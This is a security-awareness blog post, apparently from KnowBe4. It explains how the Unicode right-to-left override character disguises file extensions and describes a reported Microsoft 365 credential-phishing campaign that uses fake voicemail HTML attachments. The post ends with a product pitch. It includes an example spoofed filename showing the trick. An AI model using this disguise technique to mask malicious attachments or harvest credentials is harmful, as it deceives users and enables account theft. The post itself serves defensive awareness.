20 Year-Old “Right-to-Left Override” Functionality Used in Attacks to Trick Microsoft 365 Users Out of Credentials

20 Year Old Functionality Used in AttacksUsed to disguise malicious file extensions, this legacy functionality is being repurposed in attacks to obfuscate attachment types and steal credentials in an impressive way.

Some languages in the world (such as Hebrew and Arabic) read right-to-left, as opposed to most languages (including English) that read left-to-right. To account for this, years ago, a non-printing Unicode character was devised [U+202e] to create a “right-to-left override”, better known as RLO.

For example, if I was to use that Unicode character in the phrase “Cyber[U+202e]Security”, it would be displayed “CyberytiruceS”. Now, apply this concept to, say, a malicious filename: “MaliciousAttachment[U+202e]pdf.exe” would be displayed in Windows as “MaliciousAttachmentexe.pdf”. You can quickly see how this can take a file that is obviously suspicious at least, and make it appear very much benign, and even seem business-appropriate.

In a new attack documented by security vendor Vade Secure, this method of obfuscation and social engineering has been seen recently in the wild targeting Microsoft 365 users. In the attack, victims are sent an email with a “voice mail” attached with a filename that ends in “mth.mp3”. Now, remember the RLO principles and you realize with the right placement of the Unicode character, this becomes “mp3.htm” – an HTML file! The HTML is loaded in the browser and the user is presented with a Microsoft 365 logon screen:

hackers 4

Source: Vade Secure

Behind the scenes, the HTML code includes a POST command to a server controlled by the attackers that will eventually contain the credentials entered by the victim user.

The big red flag here is receiving a voicemail in your inbox as an attachment. Users that undergo Security Awareness Training will spot this immediately and – at very least – find it suspicious. Proper training tells them to not engage with such content, helping to avoid becoming a victim of these attacks.

Find out which of your users' emails are exposed before bad actors do.

Many of the email addresses and identities of your organization are exposed on the internet and easy to find for cybercriminals. With that email attack surface, they can launch social engineering, spear phishing and ransomware attacks on your organization. KnowBe4's Email Exposure Check Pro (EEC) identifies the at-risk users in your organization by crawling business social media information and now thousands of breach databases.

EECPro-1Here's how it works:

  • The first stage does deep web searches to find any publicly available organizational data
  • The second stage finds any users that have had their account information exposed in any of several thousand breaches
  • You will get a summary report PDF as well as a link to the full detailed report
  • Results in minutes!

Get Your Free Report

PS: Don't like to click on redirected buttons? Cut & Paste this link in your browser:


Subscribe to Our Blog

Comprehensive Anti-Phishing Guide

Get the latest about social engineering

Subscribe to CyberheistNews